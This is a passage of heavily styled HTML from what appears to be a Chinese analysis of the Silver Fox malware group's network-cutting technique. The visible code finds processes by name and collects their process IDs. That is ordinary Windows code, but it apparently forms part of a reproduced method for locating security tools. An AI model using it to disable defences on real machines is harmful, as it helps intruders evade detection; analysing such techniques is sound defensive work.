style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PROCESSENTRY32W pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwSize </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32FirstW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Process32FirstW failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">do</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">processName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">szExeFile</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">push_back</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">th32ProcessID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[+] Found process: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%s</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> (PID: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">szExeFile, pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">th32ProcessID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 